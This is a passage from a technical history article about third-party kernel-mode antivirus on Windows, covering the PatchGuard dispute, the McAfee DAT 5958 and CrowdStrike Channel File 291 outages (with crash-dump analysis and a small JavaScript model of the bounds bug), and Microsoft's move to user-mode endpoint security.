&lt;h3&gt;The political fight&lt;/h3&gt;
&lt;p&gt;Symantec and McAfee did not see it that way in 2005. To them, PatchGuard was Microsoft using a security feature to advantage its own emerging Microsoft Forefront Client Security antivirus product against the entire third-party industry. The complaint escalated to the European Commission in October 2006 [@wiki-kpp]. Stephen Toulouse, then a Microsoft senior product manager, replied in InformationWeek with the line that anchors this section: &lt;em&gt;&quot;Either everybody has access to the kernel, or nobody does. Malware writers exploit the same interfaces to access Windows kernel, a threat that Microsoft says outweighs the benefits. Modifying the kernel also compromises Windows performance, according to the company&quot;&lt;/em&gt; [@informationweek-2006-toulouse]. Microsoft&apos;s binary-symmetry position was that any vetting scheme -- &quot;trusted vendors get kernel access&quot; -- would simply produce malware that pretended to be a trusted vendor. The only stable equilibria were &quot;everyone&quot; and &quot;no one.&quot; Microsoft chose &quot;no one for the things PatchGuard protects,&quot; and then opened a parallel migration path of documented callback APIs as the supported alternative.&lt;/p&gt;

The Symantec and McAfee complaints in 2006 were filed in the wake of Microsoft&apos;s own 2005 entry into the corporate antivirus market with what became Forefront Client Security. The trade press read it as the same competitive grievance Netscape filed against Microsoft a decade earlier: a platform owner introducing first-party products into a market the platform owner also regulated. Gartner&apos;s John Pescatore framed the worry, quoted in the same InformationWeek piece, as Microsoft becoming *&quot;the layer between the user and the security products&quot;* [@informationweek-2006-toulouse]. The European Commission opened an inquiry; Microsoft compromised by documenting the callback APIs and shipping the August 2007 update to KPP [@ms-advisory-932596]. The two AV vendors stayed in business; their kernel hooks moved from SSDT patches to `PsSetCreateProcessNotifyRoutine` calls. Twenty years later, the same two vendors -- both still selling Windows EDR products -- are now publicly endorsing Microsoft&apos;s move to take *all* third-party EDR out of the kernel. The political ground really has shifted; we will see by how much in section 6.
&lt;h3&gt;The lesson Microsoft drew, and the lesson it did not yet draw&lt;/h3&gt;
&lt;p&gt;The 2005 to 2007 round produced a real, durable architectural lesson: &lt;em&gt;documented APIs are stabler than hooks&lt;/em&gt;. A vendor who wrote a driver that called &lt;code&gt;PsSetCreateProcessNotifyRoutineEx&lt;/code&gt; could rely on Microsoft to preserve the API across Windows builds. A vendor who wrote a driver that patched the SSDT pointer table directly could rely on the next Windows service pack to break it without warning, or now on PatchGuard to bug-check the host. Every shipping Windows EDR in 2026 lives downstream of that lesson -- their kernel drivers use the documented callback APIs and they do not patch kernel structures inline.&lt;/p&gt;
&lt;p&gt;But there was a second lesson Microsoft did not draw in 2005. The PatchGuard fight was about &lt;em&gt;technique&lt;/em&gt; (do not patch the SSDT) and it stopped there. It did not pose the deeper question: &lt;em&gt;should third-party kernel drivers exist at all for AV?&lt;/em&gt; That question -- whether vendor-authored Ring-0 code is a fleet-scale reliability liability regardless of whether it hooks or uses callbacks -- was visible in principle in 2005 and ignored. Microsoft would not pose it publicly for another nineteen years. What changed, in the meantime, was a slow drip of failures that should have made the question unavoidable and somehow did not. That drip is the subject of section 4.&lt;/p&gt;
&lt;h2&gt;4. Fourteen Years of Kernel-Driver Disasters&lt;/h2&gt;
&lt;p&gt;If the kernel-mode antivirus architecture was a 1999 design choice, you would expect it to have aged badly. It did. The pattern played out generation after generation, vendor after vendor, year after year, with the same general shape: a vendor pushed content; the vendor kernel driver consumed the content; the content had a bug the validator missed; the driver crashed the kernel; the fleet went down. The most consequential single instance of the pattern, before July 19, 2024, happened on April 21, 2010 with McAfee VirusScan and a daily virus definition update named DAT 5958.&lt;/p&gt;
&lt;h3&gt;McAfee DAT 5958, April 21, 2010&lt;/h3&gt;
&lt;p&gt;McAfee shipped its 5958 DAT file. The file misidentified &lt;code&gt;svchost.exe&lt;/code&gt; -- the legitimate Windows service host -- as &lt;code&gt;W32/Wecorl.a&lt;/code&gt;, a network worm. The McAfee kernel driver quarantined &lt;code&gt;svchost.exe&lt;/code&gt; per the false positive. On Windows XP SP3 fleets at hospitals, police departments, schools, and government agencies across the U.S., the result was an immediate reboot loop and total loss of networking [@uscert-mcafee-2010, @sans-isc-8656, @askperf-mcafee].&lt;/p&gt;
&lt;p&gt;US-CERT&apos;s contemporaneous advisory captured the failure mode in a single sentence: &lt;em&gt;&quot;US-CERT is aware of public reports indicating that McAfee DAT release 5958 is incorrectly identifying the valid system file, C:\Windows\system32\svchost.exe, as containing malicious code... Symptoms include a denial-of-service condition when the McAfee software attempts to clean the file&quot;&lt;/em&gt; [@uscert-mcafee-2010]. SANS&apos;s Internet Storm Center noted the same morning that &lt;em&gt;&quot;DAT file version 5958 is causing widespread problems with Windows XP SP3. The affected systems will enter a reboot loop and lose all network access&quot;&lt;/em&gt; [@sans-isc-8656]. Microsoft&apos;s own AskPerf team, in a TechCommunity post dated April 21, 2010, walked through the recovery steps and the EXTRA.DAT remediation [@askperf-mcafee].&lt;/p&gt;
&lt;p&gt;Here is the structural point, and it matters enormously for the rest of this article: &lt;em&gt;the McAfee driver was doing nothing PatchGuard would have prevented&lt;/em&gt;. It was a fully Generation-2 design, using documented kernel callback APIs, with no inline kernel patching whatsoever. The 2005 PatchGuard fight was politically irrelevant to the 2010 McAfee outage, because PatchGuard was answering a different question -- &quot;does the vendor patch SSDT entries inline?&quot; -- when the question that produced the McAfee outage was &quot;does the vendor&apos;s signed, callback-using, fully-supported kernel driver act on data that turns out to be wrong?&quot; The 2005 fix did not address the 2010 fault.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; McAfee 2010 and CrowdStrike 2024 are architecturally identical: a vendor pushed content; the vendor kernel driver consumed the content; the content was wrong in a way that the validator did not catch; the driver crashed the fleet. The 2005 PatchGuard fight had been about a different problem entirely. The architecture that produced both failures -- &quot;vendor-authored Ring-0 code consuming cloud-pushed updates&quot; -- was untouched by the 2005 fix and would not be touched again until 2024.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;The mid-2010s tail&lt;/h3&gt;
&lt;p&gt;Between 2010 and 2024 the same pattern reappeared at smaller scale, episodically, across the vendor cohort. Symantec, Trend Micro, Kaspersky, and Sophos each shipped at least one driver or definition update during this period that produced blue-screen reports on customer fleets. The Three Buddy Problem podcast, recorded on July 19, 2024 in the immediate aftermath of the CrowdStrike outage, opens with Costin Raiu drawing the line back from 2024 to 2010 explicitly: the lesson the industry promised itself after McAfee 5958 was &lt;em&gt;staged rollouts&lt;/em&gt;, and the lesson the industry actually implemented was &lt;em&gt;insufficient&lt;/em&gt; [@three-buddy-ep5].Raiu&apos;s framing on the podcast -- &quot;we had this exact discussion in 2010, and the answer everyone agreed on was staged rollouts, and here we are again&quot; -- is the cleanest single-sentence retrospective from inside the industry. The same week, Patrick Wardle was making the same point with macOS-side framing on his Objective-See blog [@wardle-objsee-0x7b] and at the August 2024 Black Hat USA talk whose slides he later published [@wardle-speakerdeck].&lt;/p&gt;
&lt;h3&gt;The Apple natural experiment, September 2024&lt;/h3&gt;
&lt;p&gt;Two months after CrowdStrike Channel File 291, Apple shipped macOS 15 Sequoia on September 16, 2024 with deprecated Application Firewall property-list interfaces [@bleepingcomputer-sequoia]. CrowdStrike Falcon for macOS, ESET Endpoint Security, Microsoft Defender for Mac, and SentinelOne all broke their network filtering [@securityweek-sequoia, @bleepingcomputer-sequoia]. Apple shipped macOS 15.0.1 on October 3, 2024, seventeen days later, restoring compatibility [@techcrunch-sequoia]. The TechCrunch report has Patrick Wardle on the record, framing the architectural difference in one line: &lt;em&gt;&quot;a fix for the networking issues that plagued the initial macOS 15 release... And to any Apple apologist who blamed 3rd-party vendors, you deserve to be slapped with a large trout as this was an Apple bug reported before GM&quot;&lt;/em&gt; [@techcrunch-sequoia].&lt;/p&gt;
&lt;p&gt;That second sentence is the load-bearing one. The Sequoia bug was a 1st-party regression in the framework boundary between macOS and third-party endpoint security tools. It degraded EDR features substantially -- network filtering disappeared on every affected host -- but no host kernel-panicked. None of the affected EDR vendor processes brought down macOS. None of the affected hosts entered a reboot loop. The same general failure mode as Channel File 291 produced a fundamentally different blast radius, and the only reason for the difference is architectural: Apple had moved third-party endpoint security out of macOS kernel mode in 2019 with the Endpoint Security framework [@apple-esf-docs]. We will return to ESF in section 7.&lt;/p&gt;

The macOS 15 Sequoia outage and the Windows Channel File 291 outage occurred within ten weeks of each other and shared the same general structure: a 1st-party platform event meeting a third-party security product loaded for runtime introspection. The Windows event panicked the kernel on 8.5 million hosts. The macOS event produced a feature regression that vendors patched out within three weeks and Apple repaired in 15.0.1. The two events are the article&apos;s strongest single comparative datum that architecture, not vendor reliability, was the variable.

timeline
    title Recurring kernel-driver and platform faults, 2005 to 2024
    2005 : PatchGuard ships on Windows x64
         : Symantec and McAfee escalate antitrust complaints
    2010 : McAfee DAT 5958 quarantines svchost.exe on Windows XP SP3
         : Fleet-scale reboot loops at hospitals, police, schools
    2014 : Various smaller vendor BSOD events in the long tail
    2019 : Apple ships macOS Catalina Endpoint Security framework
         : Third-party AV deprecated from kernel mode on macOS
    2024 : CrowdStrike Channel File 291 on July 19, 8.5M hosts
         : Apple ships macOS 15 Sequoia on September 16
         : macOS 15.0.1 restores AV compatibility on October 3
    2024 : Microsoft Ignite announces Windows Resiliency Initiative on November 19
&lt;h3&gt;CrowdStrike Channel File 291, July 19, 2024&lt;/h3&gt;
&lt;p&gt;By July 2024 the cumulative evidence had been building for fourteen years that vendor-authored Ring-0 code was a fleet-scale reliability liability. What was different about Channel File 291 was not the &lt;em&gt;kind&lt;/em&gt; of failure but the &lt;em&gt;scale&lt;/em&gt; and the &lt;em&gt;cost&lt;/em&gt;: 8.5 million hosts on Windows in 2024 versus what was likely a six-or-seven-figure XP SP3 fleet on McAfee in 2010, and a cost calculus that included Delta Air Lines, the U.K. NHS, multiple state 911 systems, and the global air-traffic-control flow that depends on Microsoft Windows running healthy [@cs-pir-2024-07-24, @gao-24-107733, @crs-if12717-everycrsreport]. The political license to do something architectural had finally arrived. What it took, in real-world failures, to surface the architectural answer was not new evidence -- the evidence had been overwhelming for years -- but a single event large enough to make the political cost of &lt;em&gt;not&lt;/em&gt; changing untenable.&lt;/p&gt;
&lt;p&gt;So: what exactly happened inside &lt;code&gt;csagent.sys&lt;/code&gt; on the morning of July 19, 2024? That technical reconstruction is the centerpiece of this article, and it occupies the next section.&lt;/p&gt;
&lt;h2&gt;5. Inside Channel File 291&lt;/h2&gt;
&lt;p&gt;The technical centerpiece. Start by staring at the same five-field summary, reformatted from Microsoft&apos;s July 27, 2024 crash-dump walkthrough [@ms-secblog-2024-07-27]:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;READ_ADDRESS: ffff840500000074 Paged pool
IMAGE_NAME:   csagent.sys
FAULTING_IP:  csagent+e14ed
              mov  r9d, dword ptr [r8]
CALLED_FROM:  nt!KiPageFault+0x369
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Reading from low to high address, every line of that summary answers a different question. The complete line-by-line walkthrough is folded into the spoiler later in this section. First we have to understand what &lt;code&gt;csagent.sys&lt;/code&gt; was trying to do when it ran the instruction.&lt;/p&gt;

The Windows bug check raised when kernel code attempts to read from or write to a virtual address that has no valid mapping in the page tables. The &quot;nonpaged area&quot; naming is historical -- the bug check fires whenever any kernel-mode access touches an unmapped virtual address, regardless of which memory pool the address would have lived in if it had been valid.
&lt;h3&gt;What &lt;code&gt;csagent.sys&lt;/code&gt; was trying to do&lt;/h3&gt;
&lt;p&gt;&lt;code&gt;csagent.sys&lt;/code&gt; is the CrowdStrike Falcon Sensor kernel driver, the Ring-0 component that has been part of the Falcon product since its earliest Windows releases. By 2024, this driver did considerably more than mediate file I/O and process creation. According to CrowdStrike&apos;s own Root Cause Analysis published on August 6, 2024, &lt;code&gt;csagent.sys&lt;/code&gt; includes a &lt;em&gt;Content Interpreter&lt;/em&gt; that runs at kernel privilege and consumes binary detection rules shipped from the Falcon Cloud [@cs-rca-2024-08-06]. CrowdStrike&apos;s terminology distinguishes two kinds of content delivery: &lt;em&gt;Sensor Content&lt;/em&gt;, which is bundled with each released sensor binary and updates at the sensor release cadence; and &lt;em&gt;Rapid Response Content&lt;/em&gt;, which is delivered via channel files like Channel File 291 and updates at a much faster cadence to keep ahead of novel adversary behavior [@cs-pir-2024-07-24]. Channel files are treated as data, not code -- but they are consumed by the Content Interpreter, which is code, running in the kernel.The Sensor Content versus Rapid Response Content distinction is the architectural detail that determines why a content update could reach the kernel at all. Sensor Content is signed and version-bumped together with the driver binary; Rapid Response Content is pushed independently and rapidly. The Falcon architecture used the Rapid Response Content channel to deliver Template Instances against a Template Type schema that the in-kernel Content Interpreter parsed. The channel-file delivery path bypassed the WHQL driver-signing scrutiny that the driver binary itself had received [@cs-pir-2024-07-24].&lt;/p&gt;

The CrowdStrike Falcon Sensor subsystem, resident inside `csagent.sys` at kernel privilege, that parses Rapid Response Content channel files at runtime. The interpreter reads a Template Instance (a binary payload of detection rules) and evaluates it against the corresponding Template Type schema declared in the sensor&apos;s compiled code. Detection rules thus take effect on a host whenever a new channel file is pushed from the Falcon Cloud, with no sensor binary update required.
&lt;h3&gt;The bug, exactly&lt;/h3&gt;
&lt;p&gt;CrowdStrike&apos;s RCA names the failure mode in plain language [@cs-rca-2024-08-06]. The IPC Template Type was introduced in Falcon sensor version 7.11, released on February 28, 2024. The IPC Template Type declares 21 input parameter fields. The sensor&apos;s integration code that fed the in-kernel Content Interpreter for this Template Type supplied only 20 input values -- one fewer than the schema declared. The Content Validator that was responsible for verifying each shipped Template Instance against its Template Type schema did not catch the count mismatch. From February 28 to July 19, all Template Instances against this Template Type happened to use a wildcard matcher on the 21st field, and the unmapped field went unread; the bug was latent for almost five months. On July 19, 2024, the deployed Template Instance for the first time used a non-wildcard matcher on the 21st field. At runtime on every Windows host with the affected Falcon sensor configuration, &lt;code&gt;csagent.sys&lt;/code&gt;&apos;s Content Interpreter indexed into the 21st parameter slot and dereferenced past the end of the input array [@cs-rca-2024-08-06].&lt;/p&gt;
&lt;p&gt;The faulting instruction was the &lt;code&gt;mov r9d, dword ptr [r8]&lt;/code&gt; that Microsoft&apos;s July 27 post reproduces. The pointer in &lt;code&gt;r8&lt;/code&gt; was the unmapped kernel address &lt;code&gt;0xffff840500000074&lt;/code&gt;. The CPU page-faulted. The fault was delivered to &lt;code&gt;nt!KiPageFault+0x369&lt;/code&gt;. The kernel bug-checked with &lt;code&gt;PAGE_FAULT_IN_NONPAGED_AREA&lt;/code&gt; [@ms-secblog-2024-07-27].&lt;/p&gt;

- `READ_ADDRESS: ffff840500000074 Paged pool`. The virtual address the faulting instruction tried to read. The `ffff8405...` prefix is the high half of the x86-64 canonical address space -- on Windows, conventionally kernel virtual memory. The &quot;Paged pool&quot; label is the memory manager&apos;s classification of where the address would have lived if it had been mapped. At this instant, it was not.
- `IMAGE_NAME: csagent.sys`. The kernel module containing the faulting instruction. This is the CrowdStrike driver.
- `FAULTING_IP: csagent+e14ed`. The offset of the instruction inside `csagent.sys`. `e14ed` is the relative virtual address of the function reading the parameter slot.
- `mov r9d, dword ptr [r8]`. The instruction itself: load a 32-bit value (`dword`) from the address in `r8` into the lower 32 bits of `r9`. This is one of the cheapest x86-64 memory loads possible; the bug is not in the instruction but in the value of `r8`.
- `CALLED_FROM: nt!KiPageFault+0x369`. The point of return into the kernel&apos;s fault handler. `KiPageFault` is the standard #PF interrupt handler in `ntoskrnl.exe`. When the page fault could not be satisfied (no mapping for the requested address), `KiPageFault` raised the bug check that stopped the system.
&lt;p&gt;About the IRQL -- the part of the post-mortem this article is most careful with. As §1 established, no public CrowdStrike RCA or Microsoft secblog post publishes the IRQL value at the moment of the fault [@ms-secblog-2024-07-27, @cs-rca-2024-08-06]. The article will not assert &lt;code&gt;DISPATCH_LEVEL&lt;/code&gt; or any other specific value, because no primary source establishes one. Treat any third-party reconstruction that names the IRQL as speculation unless it cites a primary source.&lt;/p&gt;

sequenceDiagram
    participant Cloud as Falcon Cloud
    participant Sensor as Falcon Sensor (user mode)
    participant CI as Content Interpreter (csagent.sys)
    participant TT as Template Type schema, in driver
    participant TI as Template Instance, from channel file
    participant Kernel as Windows Kernel
    Cloud-&amp;gt;&amp;gt;Sensor: Push Channel File 291 (Rapid Response Content)
    Sensor-&amp;gt;&amp;gt;CI: Hand Template Instance to in-kernel interpreter
    CI-&amp;gt;&amp;gt;TT: Read schema declaring 21 input parameter fields
    CI-&amp;gt;&amp;gt;TI: Bind Template Instance values to schema fields
    Note over CI,TI: Integration code supplied 20 values, schema expected 21
    Note over CI,TI: Content Validator did not catch the count mismatch
    CI-&amp;gt;&amp;gt;TI: Index into 21st field for non-wildcard match
    CI-&amp;gt;&amp;gt;Kernel: Read at unmapped kernel address 0xffff840500000074
    Kernel-&amp;gt;&amp;gt;Kernel: nt!KiPageFault, bug check 0x50 raised
    Note over Kernel: Operating system stops, host blue screens
&lt;h3&gt;Why a content update can crash a kernel driver&lt;/h3&gt;
&lt;p&gt;This paragraph is doing the load-bearing work of the entire article, and it deserves to be read slowly. The Falcon driver&apos;s &lt;em&gt;code&lt;/em&gt; received WHQL signing scrutiny when CrowdStrike submitted each release of &lt;code&gt;csagent.sys&lt;/code&gt; to Microsoft. The driver&apos;s &lt;em&gt;content updates&lt;/em&gt; -- the channel files like Channel File 291 -- did not. The driver was architected so that data updates could drive new detection behavior without a driver release. &lt;em&gt;Therefore the data file became the trust boundary.&lt;/em&gt; When the data file was malformed in a way the Content Validator missed, the entire WHQL signing scrutiny of the driver was effectively bypassed -- because the bug was triggered by a fully-signed driver consuming an unsigned data input that no one had validated against the driver&apos;s actual runtime expectations.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The architectural lesson of Channel File 291 is not &quot;kernel drivers are unsafe.&quot; It is that &lt;em&gt;in modern EDR architectures, the cadence of content updates vastly outruns the cadence of code review&lt;/em&gt;, and when the content is interpreted in kernel context, the content becomes a kernel input. The trust boundary moved from the signed driver to the unsigned data file, and the industry had not named that movement before July 19, 2024. Microsoft Virus Initiative 3.0, which we will meet in section 6, names it explicitly and requires partners to engineer for it.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;To make the abstract count-mismatch tangible for the reader who has never written a parser, here is the bug in a stripped JavaScript model. The JavaScript model does what every memory-safe runtime does -- it throws cleanly when you index past the end of an array -- but the comment in the unsafe branch describes the C / kernel reality: the read just returns whatever bytes happen to live at the out-of-bounds address, which on Windows kernel memory means an unmapped page and a &lt;code&gt;PAGE_FAULT_IN_NONPAGED_AREA&lt;/code&gt; bug check.&lt;/p&gt;
&lt;p&gt;{`
// Model of the in-kernel Content Interpreter from CrowdStrike&apos;s RCA.
// Template Type schema declares 21 fields; integration code supplied 20.
// On July 19, 2024, the deployed Template Instance for the first time
// used a non-wildcard matcher on the 21st field.&lt;/p&gt;
&lt;p&gt;function runInterpreter(schema, instance, safeMode) {
  for (let i = 0; i &amp;lt; schema.fieldCount; i++) {
    if (i &amp;gt;= instance.values.length) {
      if (safeMode) {
        throw new Error(`out-of-bounds read at field index ${i}`);
      } else {
        // The C / kernel reality: the load returns whatever lives at the
        // address (instance.base + i * 4). On Windows kernel memory, that
        // address may be unmapped, producing PAGE_FAULT_IN_NONPAGED_AREA.
        console.log(`unsafe read at field index ${i} -&amp;gt; kernel page fault`);
        return;
      }
    }
    const v = instance.values[i];
    console.log(`field ${i} = ${v}`);
  }
}&lt;/p&gt;
&lt;p&gt;const schema = { fieldCount: 21 };
const instance = { values: Array.from({length: 20}, (_, i) =&amp;gt; &apos;v&apos; + i) };&lt;/p&gt;
&lt;p&gt;// Memory-safe runtime catches the mismatch:
try { runInterpreter(schema, instance, true); }
catch (e) { console.log(&apos;SAFE:&apos;, e.message); }&lt;/p&gt;
&lt;p&gt;// Unsafe model showing what the in-kernel C interpreter would do:
runInterpreter(schema, instance, false);
`}&lt;/p&gt;
&lt;p&gt;The runnable model is doing one job: making the abstract &quot;20 of 21&quot; fault mode visible. In a memory-safe runtime, the validator (the runtime itself) catches the mismatch and throws. In a C kernel driver with no runtime validator, the load just happens, and whatever is at the out-of-bounds address is read. On &lt;code&gt;csagent.sys&lt;/code&gt; on every affected Windows host on July 19, 2024, what was at the out-of-bounds address was an unmapped page, and the read fired &lt;code&gt;PAGE_FAULT_IN_NONPAGED_AREA&lt;/code&gt;.&lt;/p&gt;
&lt;h3&gt;The persistence problem&lt;/h3&gt;
&lt;p&gt;CrowdStrike reverted the bad content cloud-side at 05:27 UTC, seventy-eight minutes after pushing it [@cs-pir-2024-07-24]. The revert achieved exactly the thing it was designed to achieve: no host that had not yet received the bad content would receive it. The revert achieved nothing for any host that had &lt;em&gt;already&lt;/em&gt; received the bad content. The channel file was on disk. On reboot, the Falcon sensor reloaded it. The in-kernel Content Interpreter parsed it again. The host bug-checked again. The fix required either manual safe-mode deletion of &lt;code&gt;C-00000291*.sys&lt;/code&gt; -- which became the canonical morning-of runbook circulated on every Windows admin forum -- or, later, Microsoft&apos;s purpose-built recovery tool [@mslearn-qmr, @insider-build-26120-4230]. The persistence-across-reboot pathology motivated the platform-level recovery primitive Microsoft would later ship as Quick Machine Recovery, which we will meet in section 6.&lt;/p&gt;
&lt;p&gt;The bug is mundane. The kernel context is what made it catastrophic. Twenty-five years of architectural decisions placed a vendor-authored interpreter inside the kernel, plugged it into a cloud-driven content delivery pipeline, and shipped that combination to 8.5 million machines. On the morning of July 19, 2024, those decisions composed.&lt;/p&gt;
&lt;p&gt;What the platform vendor -- Microsoft -- did about that composition is the subject of section 6.&lt;/p&gt;
&lt;h2&gt;6. The Microsoft Response: WESES, WRI, MVI 3.0&lt;/h2&gt;
&lt;p&gt;Twenty days after a Congressional witness from CrowdStrike apologized on the record [@cyberscoop-meyers, @govinfo-chrg-118hhrg60030, @meyers-testimony, @homeland-hearing-page], Microsoft did what twenty years of lobbying could not produce: it convened the named Microsoft Virus Initiative partners in Redmond and announced that &lt;em&gt;&quot;additional security capabilities outside of kernel mode&quot;&lt;/em&gt; was now a stated platform direction [@weston-2024-09-12]. From that meeting forward, the trajectory of third-party endpoint security on Windows pointed in only one direction.&lt;/p&gt;
&lt;h3&gt;September 10, 2024: the WESES summit&lt;/h3&gt;
&lt;p&gt;On September 10, 2024, Microsoft hosted the WESES summit -- the Windows Endpoint Security partner gathering, often abbreviated WESES in trade press -- at its Redmond campus. The attendees included CrowdStrike, Sophos, ESET, SentinelOne, Trend Micro, and Bitdefender, plus U.S. and European government officials [@weston-2024-09-12]. David Weston, Microsoft&apos;s vice president for enterprise and operating system security, recapped the summit in a Windows Experience Blog post on September 12, 2024 -- two days later -- and made two specific commitments on Microsoft&apos;s behalf. First, Microsoft committed publicly to &lt;em&gt;Safe Deployment Practices&lt;/em&gt; as a shared cross-vendor norm. Second, Microsoft committed to &lt;em&gt;&quot;additional security capabilities outside of kernel mode&quot;&lt;/em&gt; as a platform direction [@weston-2024-09-12]. No new branded platform yet, no GA date, no API surface. But the political commitment was, for the first time on the public record, an architectural one.&lt;/p&gt;

A Microsoft program documenting the requirements third-party antivirus and endpoint security vendors must meet to ship products that integrate with Windows -- including Security Center registration, ELAM (Early-Launch Anti-Malware) participation, and Defender exclusion negotiation [@mslearn-mvi]. MVI is the contractual surface Microsoft uses to require Windows AV vendors to engineer in particular ways; updates to MVI requirements have been the principal lever for the post-Channel-File-291 reforms.
&lt;h3&gt;November 19, 2024: Microsoft Ignite, and the Windows Resiliency Initiative&lt;/h3&gt;
&lt;p&gt;Two months later, at Microsoft Ignite on November 19, 2024, Weston announced the program by name: the &lt;em&gt;Windows Resiliency Initiative&lt;/em&gt;, four pillars (reliability including Quick Machine Recovery, fewer administrator-privileged apps, stronger app and driver allow-lists, and identity hardening), and a verbatim commitment that &lt;em&gt;&quot;a private preview will be made available for our security product [partner cohort] in July 2025&quot;&lt;/em&gt; [@ms-ignite-2024-11-19]. The &quot;private preview&quot; referred to a new set of &lt;em&gt;user-mode EDR APIs&lt;/em&gt; that Microsoft would deliver to a small named cohort of MVI partners. The Ignite post is also the first source to introduce &lt;em&gt;Quick Machine Recovery&lt;/em&gt; publicly -- the post-outage recovery primitive engineered specifically to address the on-disk-persistence pathology that Channel File 291 had exposed [@ms-ignite-2024-11-19].&lt;/p&gt;

Microsoft&apos;s descriptive phrase, used consistently in Weston&apos;s June 26, 2025 blog and the November 18, 2025 Windows Experience Blog post, for the new user-mode API surface that lets third-party EDR products subscribe to kernel-curated security telemetry without loading their own kernel driver [@weston-2025-06-26, @ms-nov-2025]. Microsoft has not, as of mid-2026, branded this as a single trademarked proper noun; trade-press shorthand like &quot;WESP&quot; should be treated as commentary, not as a Microsoft product name.
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; You will see &quot;WESP&quot; -- Windows Endpoint Security Platform, capitalized -- in trade-press coverage and conference talks. As of mid-2026 it is not a Microsoft brand. Microsoft&apos;s own primary-source language is the descriptive phrase &quot;the Windows endpoint security platform&quot; (lowercase, no acronym) [@weston-2025-06-26, @ms-nov-2025]. This article uses the Microsoft phrasing throughout.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;June 26, 2025: the WRI detailed rollout and MVI 3.0&lt;/h3&gt;
&lt;p&gt;The most consequential single document in the entire WRI story is Weston&apos;s June 26, 2025 Windows Experience Blog post [@weston-2025-06-26]. The post commits, verbatim, that &lt;em&gt;&quot;Next month, we will deliver a private preview of the Windows endpoint security platform to a set of MVI partners... security products like anti-virus and endpoint protection solutions can run in user mode just as apps do&quot;&lt;/em&gt; [@weston-2025-06-26]. That second clause is the architectural commitment in one sentence: third-party EDR on Windows runs in user mode, like every other application on Windows.&lt;/p&gt;
&lt;p&gt;The same June 26 post names the MVI partner cohort by company -- Bitdefender, CrowdStrike, ESET, SentinelOne, Sophos, Trellix, Trend Micro, and WithSecure -- and embeds on-record statements from five of them (CrowdStrike, ESET, SentinelOne, Sophos, Trellix, and Trend Micro and WithSecure also published quotes) endorsing the migration [@weston-2025-06-26]. The post lays out the requirements of &lt;em&gt;MVI 3.0&lt;/em&gt;: Safe Deployment Practices, deployment rings, monitored rollouts, and incident-response testing [@mslearn-mvi]. The November 18, 2025 Windows Experience Blog later established the MVI 3.0 effective date as April 1, 2025 [@ms-nov-2025].&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;MVI 3.0 requirement&lt;/th&gt;
&lt;th&gt;What it mechanically requires&lt;/th&gt;
&lt;th&gt;What it does not mechanically verify&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Safe Deployment Practices&lt;/td&gt;
&lt;td&gt;Vendor publishes a documented deployment process for sensor and content updates&lt;/td&gt;
&lt;td&gt;That the published process is correctly enforced in the vendor&apos;s release pipeline&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Deployment rings&lt;/td&gt;
&lt;td&gt;Vendor segments customers into staged rollout cohorts (e.g., internal, canary, GA)&lt;/td&gt;
&lt;td&gt;That ring promotion gates actually halt a rollout when a stop-signal fires&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Monitored rollouts&lt;/td&gt;
&lt;td&gt;Vendor monitors signal data during each ring transition&lt;/td&gt;
&lt;td&gt;That the monitoring catches a Channel-File-291-class latent bug&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Incident-response testing&lt;/td&gt;
&lt;td&gt;Vendor runs scheduled incident-response drills against its own rollout pipeline&lt;/td&gt;
&lt;td&gt;That drill outcomes generalize to a novel failure mode never tested&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;The cohort of named MVI 3.0 partners is the same cohort Apple&apos;s Endpoint Security framework migration targeted in 2019. The overlap is not coincidence -- the same companies sell EDR on both platforms, and the same companies are now multi-OS migrating onto the same architecture (user-mode, platform-curated telemetry). The trade press has yet to fully appreciate that the WRI is not a Microsoft-specific architecture choice; it is the second platform vendor making the same choice.&lt;/p&gt;
&lt;h3&gt;The Ionescu pivot&lt;/h3&gt;
&lt;p&gt;The single most consequential individual move in the entire two-year story is dated April 3, 2025: CrowdStrike named Alex Ionescu -- co-author of the &lt;em&gt;Windows Internals&lt;/em&gt; book series, long-time Windows kernel researcher, and former CrowdStrike employee returning to the company -- as Chief Technology Innovation Officer with an explicit charter to &lt;em&gt;&quot;lead CrowdStrike&apos;s participation in the Microsoft Virus Initiative Program (MVI 3.0), working with Microsoft to advise on the implementation of the next-generation vendor security stack for Windows&quot;&lt;/em&gt; [@cs-ionescu-ctio-2025-04-03]. Ionescu then published an on-record endorsement of Microsoft&apos;s user-mode EDR architecture in Microsoft&apos;s own June 26, 2025 Windows Experience Blog post [@weston-2025-06-26].&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; The foremost public Windows kernel researcher in the industry, now CTIO of the company whose kernel driver brought down 8.5 million Windows hosts, is on the record endorsing Microsoft&apos;s eviction of vendor kernel-mode antivirus. That is the political signal July 19, 2024 produced, and it is structurally unlike anything that preceded the outage. In 2006, the vendors fought; in 2025, the foremost vendor kernel expert is helping Microsoft build the replacement.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;November 18, 2025: the update and the graphics-driver exemption&lt;/h3&gt;
